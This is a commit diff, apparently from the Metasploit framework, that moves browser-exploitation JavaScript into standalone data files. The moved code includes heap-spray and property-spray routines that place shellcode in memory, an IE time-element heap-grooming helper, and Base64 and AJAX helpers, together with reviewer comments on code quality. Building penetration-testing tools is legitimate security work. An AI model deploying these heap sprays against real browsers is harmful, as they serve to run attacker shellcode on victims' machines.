Move all exploitation-related JavaScript to their new home
parent
bcb584ea50
commit
c926fa710b
|
@ -0,0 +1,126 @@
|
|||
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
|
||||
// variable names changed to make obfuscation easier
|
||||
var Base64 = {
|
||||
// private property
|
||||
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
|
||||
|
||||
// private method
|
||||
_utf8_encode : function ( input ){
|
||||
input = input.replace(/\\r\\n/g,"\\n");
|
||||
var utftext = "";
|
||||
var input_idx;
|
||||
|
||||
for (input_idx = 0; input_idx < input.length; input_idx++) {
|
||||
var chr = input.charCodeAt(input_idx);
|
||||
if (chr < 128) {
|
||||
utftext += String.fromCharCode(chr);
|
||||
}
|
||||
else if((chr > 127) && (chr < 2048)) {
|
||||
utftext += String.fromCharCode((chr >> 6) | 192);
|
||||
utftext += String.fromCharCode((chr & 63) | 128);
|
||||
} else {
|
||||
utftext += String.fromCharCode((chr >> 12) | 224);
|
||||
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
|
||||
utftext += String.fromCharCode((chr & 63) | 128);
|
||||
}
|
||||
}
|
||||
|
||||
return utftext;
|
||||
},
|
||||
|
||||
// public method for encoding
|
||||
encode : function( input ) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
|
||||
var input_idx = 0;
|
||||
|
||||
input = Base64._utf8_encode(input);
|
||||
|
||||
while (input_idx < input.length) {
|
||||
chr1 = input.charCodeAt( input_idx++ );
|
||||
chr2 = input.charCodeAt( input_idx++ );
|
||||
chr3 = input.charCodeAt( input_idx++ );
|
||||
|
||||
enc1 = chr1 >> 2;
|
||||
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
|
||||
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
|
||||
enc4 = chr3 & 63;
|
||||
|
||||
if (isNaN(chr2)) {
|
||||
enc3 = enc4 = 64;
|
||||
} else if (isNaN(chr3)) {
|
||||
enc4 = 64;
|
||||
}
|
||||
output = output +
|
||||
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
|
||||
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
|
||||
}
|
||||
return output;
|
||||
},
|
||||
// public method for decoding
|
||||
decode : function (input) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3;
|
||||
var enc1, enc2, enc3, enc4;
|
||||
var i = 0;
|
||||
|
||||
input = input.replace(/[^A-Za-z0-9\\+\\/\\=]/g, "");
|
||||
|
||||
while (i < input.length) {
|
||||
|
||||
enc1 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc2 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc3 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc4 = this._keyStr.indexOf(input.charAt(i++));
|
||||
|
||||
chr1 = (enc1 << 2) | (enc2 >> 4);
|
||||
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
|
||||
chr3 = ((enc3 & 3) << 6) | enc4;
|
||||
|
||||
output = output + String.fromCharCode(chr1);
|
||||
|
||||
if (enc3 != 64) {
|
||||
output = output + String.fromCharCode(chr2);
|
||||
}
|
||||
if (enc4 != 64) {
|
||||
output = output + String.fromCharCode(chr3);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
output = Base64._utf8_decode(output);
|
||||
|
||||
return output;
|
||||
|
||||
},
|
||||
_utf8_decode : function (utftext) {
|
||||
var string = "";
|
||||
var input_idx = 0;
|
||||
var chr1 = 0;
|
||||
var chr2 = 0;
|
||||
var chr3 = 0;
|
||||
|
||||
while ( input_idx < utftext.length ) {
|
||||
|
||||
chr1 = utftext.charCodeAt(input_idx);
|
||||
|
||||
if (chr1 < 128) {
|
||||
string += String.fromCharCode(chr1);
|
||||
input_idx++;
|
||||
}
|
||||
else if((chr1 > 191) && (chr1 < 224)) {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
|
||||
input_idx += 2;
|
||||
} else {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
chr3 = utftext.charCodeAt(input_idx+2);
|
||||
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
|
||||
input_idx += 3;
|
||||
}
|
||||
}
|
||||
|
||||
return string;
|
||||
}
|
||||
|
||||
};
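Review bot: The doubled backslashes in `input.replace(/\\r\\n/g,"\\n")` in `_utf8_encode` and in the `decode` filter `/[^A-Za-z0-9\\+\\/\\=]/g` look like leftovers from the Ruby heredoc this code was copied out of, where each `\\` collapsed to a single backslash before the script reached the browser. Read verbatim from a .js file, the first pattern matches a literal backslash-r-backslash-n sequence instead of CRLF. The character class in `decode` now also lets backslashes through, so `this._keyStr.indexOf` returns -1 for them and the decoded output is wrong. Assuming the file is stored exactly as rendered here, the two lines should read `input = input.replace(/\r\n/g,"\n");` and `input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");`.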
|
|
@ -0,0 +1,17 @@
|
|||
var memory = new Array();
|
||||
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
|
||||
var index;
|
||||
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
|
||||
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
|
||||
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
|
||||
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
|
||||
|
||||
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
|
||||
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
|
||||
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
|
||||
|
||||
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
|
||||
for (index = 0; index < heapBlockCnt; index++) {
|
||||
memory[index] = retSlide + shellcode;
|
||||
}
|
||||
}
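Review bot: This file defines a global `sprayHeap(shellcode, heapSprayAddr, heapBlockSize)`, and the `sym_div_container` file added later in this commit (read as `property_spray.js` by the Ruby side) defines a global `sprayHeap( oArg )` with a different signature. Whichever script is emitted last on a page therefore silently replaces the other. Now that both live as standalone files, one of them could be renamed. At minimum, a header comment such as `// NOTE: shares the global name sprayHeap with property_spray.js` would record the constraint for maintainers.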
|
|
@ -0,0 +1,31 @@
|
|||
function mstime_malloc(oArg) {
|
||||
shellcode = oArg.shellcode;
|
||||
offset = oArg.offset;
|
||||
heapBlockSize = oArg.heapBlockSize;
|
||||
objId = oArg.objId;
|
||||
|
||||
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
|
||||
if (offset == undefined) { offset = 0; }
|
||||
if (heapBlockSize == undefined) { throw "Size must be defined"; }
|
||||
|
||||
buf = "";
|
||||
for (i=0; i < heapBlockSize/4; i++) {
|
||||
if (i == offset) {
|
||||
if (i == 0) { buf += shellcode; }
|
||||
else { buf += ";" + shellcode; }
|
||||
}
|
||||
else {
|
||||
buf += ";#W00TA";
|
||||
}
|
||||
}
|
||||
|
||||
e = document.getElementById(objId);
|
||||
if (e == null) {
|
||||
eleId = "W00TB"
|
||||
acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
|
||||
document.body.innerHTML = document.body.innerHTML + acTag;
|
||||
e = document.getElementById(eleId);
|
||||
}
|
||||
try { e.values = buf; }
|
||||
catch (e) {}
|
||||
}
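Review bot: Every working variable in `mstime_malloc` (`shellcode`, `offset`, `heapBlockSize`, `objId`, `buf`, `i`, `e`, `eleId`, `acTag`) is assigned without `var`, so each call writes to the global object and can clobber same-named variables in the host page or in the other helpers. The same pattern appears in the `sprayHeap( oArg )` file (`shellcode`, `offset`, `heapBlockSize`, `maxAllocs`, `objId`, `junk`) and in the `ajax_download` file (`method`, `path`, `data`, `xmlHttp`) added by this commit. Declaring them locally, for example `var shellcode = oArg.shellcode, offset = oArg.offset;`, keeps each function self-contained. The statements `eleId = "W00TB"` and `acTag = ...` also rely on automatic semicolon insertion, and `catch (e) {}` reuses the name of the element variable while discarding the error.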
|
|
@ -0,0 +1,39 @@
|
|||
var sym_div_container;
|
||||
function sprayHeap( oArg ) {
|
||||
|
||||
shellcode = oArg.shellcode;
|
||||
offset = oArg.offset;
|
||||
heapBlockSize = oArg.heapBlockSize;
|
||||
maxAllocs = oArg.maxAllocs;
|
||||
objId = oArg.objId;
|
||||
|
||||
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
|
||||
if (offset == undefined) { offset = 0x00; }
|
||||
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
|
||||
if (maxAllocs == undefined) { maxAllocs = 0x350; }
|
||||
|
||||
if (offset > 0x800) { throw "Bad alignment"; }
|
||||
|
||||
sym_div_container = document.getElementById(objId);
|
||||
|
||||
if (sym_div_container == null) {
|
||||
sym_div_container = document.createElement("div");
|
||||
}
|
||||
|
||||
sym_div_container.style.cssText = "display:none";
|
||||
var data;
|
||||
junk = unescape("%u2020%u2020");
|
||||
while (junk.length < offset+0x1000) junk += junk;
|
||||
|
||||
data = junk.substring(0,offset) + shellcode;
|
||||
data += junk.substring(0,0x800-offset-shellcode.length);
|
||||
|
||||
while (data.length < heapBlockSize) data += data;
|
||||
|
||||
for (var i = 0; i < maxAllocs; i++)
|
||||
{
|
||||
var obj = document.createElement("button");
|
||||
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
||||
sym_div_container.appendChild(obj);
|
||||
}
|
||||
}
|
|
@ -0,0 +1,27 @@
|
|||
function ajax_download(oArg) {
|
||||
method = oArg.method;
|
||||
path = oArg.path;
|
||||
data = oArg.data;
|
||||
|
||||
if (method == undefined) { method = "GET"; }
|
||||
if (method == path) { throw "Missing parameter 'path'"; }
|
||||
if (data == undefined) { data = null; }
|
||||
|
||||
if (window.XMLHttpRequest) {
|
||||
xmlHttp = new XMLHttpRequest();
|
||||
}
|
||||
else {
|
||||
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
|
||||
}
|
||||
|
||||
if (xmlHttp.overrideMimeType) {
|
||||
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
|
||||
}
|
||||
|
||||
xmlHttp.open(method, path, false);
|
||||
xmlHttp.send(data);
|
||||
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
|
||||
return xmlHttp.responseText;
|
||||
}
|
||||
return null;
|
||||
}
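Review bot: The guard `if (method == path) { throw "Missing parameter 'path'"; }` compares the two arguments with each other instead of testing `path`, so a missing `path` is never reported and the call proceeds to `xmlHttp.open(method, path, false)` with `path` undefined. It also throws spuriously when a caller happens to pass equal strings for both. The check was carried over unchanged from the inline Ruby string removed elsewhere in this commit. It should read `if (path == undefined) { throw "Missing parameter 'path'"; }`.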
|
|
@ -3,8 +3,11 @@ require 'rex/service_manager'
|
|||
require 'rex/exploitation/obfuscatejs'
|
||||
require 'rex/exploitation/encryptjs'
|
||||
require 'rex/exploitation/heaplib'
|
||||
require 'rex/exploitation/javascriptnetwork'
|
||||
require 'rex/exploitation/javascriptcrypto'
|
||||
require 'rex/exploitation/javascriptosdetect'
|
||||
require 'rex/exploitation/javascriptaddonsdetect'
|
||||
require 'rex/exploitation/javascriptexploitation'
|
||||
|
||||
module Msf
|
||||
|
||||
|
@ -710,136 +713,7 @@ protected
|
|||
end
|
||||
|
||||
def js_base64
|
||||
js = <<-ENDJS
|
||||
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
|
||||
// variable names changed to make obfuscation easier
|
||||
var Base64 = {
|
||||
// private property
|
||||
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
|
||||
|
||||
// private method
|
||||
_utf8_encode : function ( input ){
|
||||
input = input.replace(/\\r\\n/g,"\\n");
|
||||
var utftext = "";
|
||||
var input_idx;
|
||||
|
||||
for (input_idx = 0; input_idx < input.length; input_idx++) {
|
||||
var chr = input.charCodeAt(input_idx);
|
||||
if (chr < 128) {
|
||||
utftext += String.fromCharCode(chr);
|
||||
}
|
||||
else if((chr > 127) && (chr < 2048)) {
|
||||
utftext += String.fromCharCode((chr >> 6) | 192);
|
||||
utftext += String.fromCharCode((chr & 63) | 128);
|
||||
} else {
|
||||
utftext += String.fromCharCode((chr >> 12) | 224);
|
||||
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
|
||||
utftext += String.fromCharCode((chr & 63) | 128);
|
||||
}
|
||||
}
|
||||
|
||||
return utftext;
|
||||
},
|
||||
|
||||
// public method for encoding
|
||||
encode : function( input ) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
|
||||
var input_idx = 0;
|
||||
|
||||
input = Base64._utf8_encode(input);
|
||||
|
||||
while (input_idx < input.length) {
|
||||
chr1 = input.charCodeAt( input_idx++ );
|
||||
chr2 = input.charCodeAt( input_idx++ );
|
||||
chr3 = input.charCodeAt( input_idx++ );
|
||||
|
||||
enc1 = chr1 >> 2;
|
||||
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
|
||||
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
|
||||
enc4 = chr3 & 63;
|
||||
|
||||
if (isNaN(chr2)) {
|
||||
enc3 = enc4 = 64;
|
||||
} else if (isNaN(chr3)) {
|
||||
enc4 = 64;
|
||||
}
|
||||
output = output +
|
||||
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
|
||||
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
|
||||
}
|
||||
return output;
|
||||
},
|
||||
// public method for decoding
|
||||
decode : function (input) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3;
|
||||
var enc1, enc2, enc3, enc4;
|
||||
var i = 0;
|
||||
|
||||
input = input.replace(/[^A-Za-z0-9\\+\\/\\=]/g, "");
|
||||
|
||||
while (i < input.length) {
|
||||
|
||||
enc1 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc2 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc3 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc4 = this._keyStr.indexOf(input.charAt(i++));
|
||||
|
||||
chr1 = (enc1 << 2) | (enc2 >> 4);
|
||||
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
|
||||
chr3 = ((enc3 & 3) << 6) | enc4;
|
||||
|
||||
output = output + String.fromCharCode(chr1);
|
||||
|
||||
if (enc3 != 64) {
|
||||
output = output + String.fromCharCode(chr2);
|
||||
}
|
||||
if (enc4 != 64) {
|
||||
output = output + String.fromCharCode(chr3);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
output = Base64._utf8_decode(output);
|
||||
|
||||
return output;
|
||||
|
||||
},
|
||||
_utf8_decode : function (utftext) {
|
||||
var string = "";
|
||||
var input_idx = 0;
|
||||
var chr1 = 0;
|
||||
var chr2 = 0;
|
||||
var chr3 = 0;
|
||||
|
||||
while ( input_idx < utftext.length ) {
|
||||
|
||||
chr1 = utftext.charCodeAt(input_idx);
|
||||
|
||||
if (chr1 < 128) {
|
||||
string += String.fromCharCode(chr1);
|
||||
input_idx++;
|
||||
}
|
||||
else if((chr1 > 191) && (chr1 < 224)) {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
|
||||
input_idx += 2;
|
||||
} else {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
chr3 = utftext.charCodeAt(input_idx+2);
|
||||
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
|
||||
input_idx += 3;
|
||||
}
|
||||
}
|
||||
|
||||
return string;
|
||||
}
|
||||
|
||||
|
||||
};
|
||||
|
||||
ENDJS
|
||||
js = Rex::Exploitation::JavascriptCrypto.base64
|
||||
opts = {
|
||||
'Symbols' => {
|
||||
'Variables' => %w{ Base64 encoding result _keyStr encoded_data utftext input_idx
|
||||
|
@ -872,34 +746,7 @@ protected
|
|||
# </script>
|
||||
#
|
||||
def js_ajax_download
|
||||
%Q|function ajax_download(oArg) {
|
||||
method = oArg.method;
|
||||
path = oArg.path;
|
||||
data = oArg.data;
|
||||
|
||||
if (method == undefined) { method = "GET"; }
|
||||
if (method == path) { throw "Missing parameter 'path'"; }
|
||||
if (data == undefined) { data = null; }
|
||||
|
||||
if (window.XMLHttpRequest) {
|
||||
xmlHttp = new XMLHttpRequest();
|
||||
}
|
||||
else {
|
||||
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
|
||||
}
|
||||
|
||||
if (xmlHttp.overrideMimeType) {
|
||||
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
|
||||
}
|
||||
|
||||
xmlHttp.open(method, path, false);
|
||||
xmlHttp.send(data);
|
||||
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
|
||||
return xmlHttp.responseText;
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
|
||||
Rex::Exploitation::JavascriptNetwork.ajax_download
|
||||
end
|
||||
|
||||
|
||||
|
@ -935,39 +782,7 @@ protected
|
|||
# </script>
|
||||
#
|
||||
def js_mstime_malloc
|
||||
%Q|
|
||||
function mstime_malloc(oArg) {
|
||||
shellcode = oArg.shellcode;
|
||||
offset = oArg.offset;
|
||||
heapBlockSize = oArg.heapBlockSize;
|
||||
objId = oArg.objId;
|
||||
|
||||
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
|
||||
if (offset == undefined) { offset = 0; }
|
||||
if (heapBlockSize == undefined) { throw "Size must be defined"; }
|
||||
|
||||
buf = "";
|
||||
for (i=0; i < heapBlockSize/4; i++) {
|
||||
if (i == offset) {
|
||||
if (i == 0) { buf += shellcode; }
|
||||
else { buf += ";" + shellcode; }
|
||||
}
|
||||
else {
|
||||
buf += ";##{Rex::Text.rand_text_hex(6)}";
|
||||
}
|
||||
}
|
||||
|
||||
e = document.getElementById(objId);
|
||||
if (e == null) {
|
||||
eleId = "#{Rex::Text.rand_text_alpha(5)}"
|
||||
acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
|
||||
document.body.innerHTML = document.body.innerHTML + acTag;
|
||||
e = document.getElementById(eleId);
|
||||
}
|
||||
try { e.values = buf; }
|
||||
catch (e) {}
|
||||
}
|
||||
|
|
||||
Rex::Exploitation::JavascriptExploitation.mstime_malloc
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -993,69 +808,12 @@ protected
|
|||
# </script>
|
||||
#
|
||||
def js_property_spray
|
||||
sym_div_container = Rex::Text.rand_text_alpha(rand(10) + 5)
|
||||
js = %Q|
|
||||
var #{sym_div_container};
|
||||
function sprayHeap( oArg ) {
|
||||
|
||||
shellcode = oArg.shellcode;
|
||||
offset = oArg.offset;
|
||||
heapBlockSize = oArg.heapBlockSize;
|
||||
maxAllocs = oArg.maxAllocs;
|
||||
objId = oArg.objId;
|
||||
|
||||
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
|
||||
if (offset == undefined) { offset = 0x00; }
|
||||
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
|
||||
if (maxAllocs == undefined) { maxAllocs = 0x350; }
|
||||
|
||||
if (offset > 0x800) { throw "Bad alignment"; }
|
||||
|
||||
#{sym_div_container} = document.getElementById(objId);
|
||||
|
||||
if (#{sym_div_container} == null) {
|
||||
#{sym_div_container} = document.createElement("div");
|
||||
}
|
||||
|
||||
#{sym_div_container}.style.cssText = "display:none";
|
||||
var data;
|
||||
junk = unescape("%u2020%u2020");
|
||||
while (junk.length < offset+0x1000) junk += junk;
|
||||
|
||||
data = junk.substring(0,offset) + shellcode;
|
||||
data += junk.substring(0,0x800-offset-shellcode.length);
|
||||
|
||||
while (data.length < heapBlockSize) data += data;
|
||||
|
||||
for (var i = 0; i < maxAllocs; i++)
|
||||
{
|
||||
var obj = document.createElement("button");
|
||||
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
||||
#{sym_div_container}.appendChild(obj);
|
||||
}
|
||||
}
|
||||
|
|
||||
Rex::Exploitation::JavascriptExploitation.property_spray
|
||||
end
|
||||
|
||||
def js_heap_spray
|
||||
js = %Q|var memory = new Array();
|
||||
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
|
||||
var index;
|
||||
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
|
||||
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
|
||||
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
|
||||
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
|
||||
js = Rex::Exploitation::JavascriptExploitation.heap_spray
|
||||
|
||||
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
|
||||
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
|
||||
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
|
||||
|
||||
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
|
||||
for (index = 0; index < heapBlockCnt; index++) {
|
||||
memory[index] = retSlide + shellcode;
|
||||
}
|
||||
}
|
||||
|
|
||||
opts = {
|
||||
'Symbols' => {
|
||||
'Variables' => %w{ shellcode retSlide payLoadSize memory index
|
||||
|
|
|
@ -16,7 +16,7 @@ class JavascriptAddonsDetect < JSObfu
|
|||
|
||||
def initialize(custom_js = '', opts = {})
|
||||
@js = custom_js
|
||||
@js += ::File.read(::File.join(::File.dirname(__FILE__), "javascriptaddonsdetect.js"))
|
||||
@js += ::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "detect", "addons.js"))
|
||||
|
||||
super @js
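Review bot: The new path is assembled as `::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", ...)`, and the same three-level climb is repeated in `JavascriptOSDetect` and in every class method of the new `JavascriptCrypto`, `JavascriptExploitation` and `JavascriptNetwork` files. The location of the data directory is therefore hard-coded relative to the source tree in seven places. A single helper that resolves the `data/js` directory once would keep them in step; the framework already exposes `Msf::Config.data_directory`, if depending on it from Rex is acceptable. `initialize` continues past the end of this hunk.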
|
||||
|
||||
|
|
|
@ -0,0 +1,22 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/text'
|
||||
require 'rex/exploitation/jsobfu'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
#
|
||||
# Provides cryptographic functions in JavaScript
|
||||
#
|
||||
class JavascriptCrypto < JSObfu
|
||||
|
||||
def self.base64
|
||||
::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "crypto", "base64.js"))
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
end
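Review bot: `require 'msf/core'` and `require 'rex/text'` are not used by anything in this file, since `self.base64` only calls `::File.read`. Requiring `msf/core` from a `Rex::Exploitation` class also makes what is normally the lower-level library load the framework on top of it. The same applies to both requires in the `JavascriptNetwork` file and to `require 'msf/core'` in `JavascriptExploitation`. A comment on `self.base64` such as `# Returns the contents of data/js/crypto/base64.js as a String, without obfuscation` would also tell callers that the method returns the raw file and does not run it through the `JSObfu` superclass.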
|
|
@ -0,0 +1,37 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/text'
|
||||
require 'rex/exploitation/jsobfu'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
#
|
||||
# Provides exploitation functions in JavaScript
|
||||
#
|
||||
class JavascriptExploitation < JSObfu
|
||||
|
||||
def self.mstime_malloc
|
||||
js = ::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "exploitation", "mstime_malloc.js"))
|
||||
js = js.gsub(/W00TA/, Rex::Text.rand_text_hex(6))
|
||||
js = js.gsub(/W00TB/, Rex::Text.rand_text_hex(5))
|
||||
|
||||
js
|
||||
end
|
||||
|
||||
def self.property_spray
|
||||
js = ::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "exploitation", "property_spray.js"))
|
||||
js = js.gsub(/sym_div_container/, Rex::Text.rand_text_alpha(rand(10) + 5))
|
||||
|
||||
js
|
||||
end
|
||||
|
||||
def self.heap_spray
|
||||
::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "exploitation", "heap_spray.js"))
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
end
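Review bot: `self.mstime_malloc` replaces `W00TB` with `Rex::Text.rand_text_hex(5)`, whereas the inline code this commit removes from `js_mstime_malloc` generated that element id with `Rex::Text.rand_text_alpha(5)`. The move is therefore not behaviour-preserving, because the id can now begin with a digit. If that was not intended, the line should stay `js = js.gsub(/W00TB/, Rex::Text.rand_text_alpha(5))`. The placeholder tokens (`W00TA`, `W00TB`, `sym_div_container`) form an undocumented contract between these methods and the .js files, so each method should carry a comment naming the token it rewrites.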
|
|
@ -0,0 +1,22 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/text'
|
||||
require 'rex/exploitation/jsobfu'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
#
|
||||
# Provides networking functions in JavaScript
|
||||
#
|
||||
class JavascriptNetwork < JSObfu
|
||||
|
||||
def self.ajax_download
|
||||
::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "network", "ajax_download.js"))
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -30,7 +30,7 @@ class JavascriptOSDetect < JSObfu
|
|||
|
||||
def initialize(custom_js = '', opts = {})
|
||||
@js = custom_js
|
||||
@js += ::File.read(::File.join(::File.dirname(__FILE__), "javascriptosdetect.js"))
|
||||
@js += ::File.read(::File.join(::File.dirname(__FILE__), "../", "../", "../", "data", "js", "detect", "os.js"))
|
||||
|
||||
super @js
|
||||
|
||||
|
|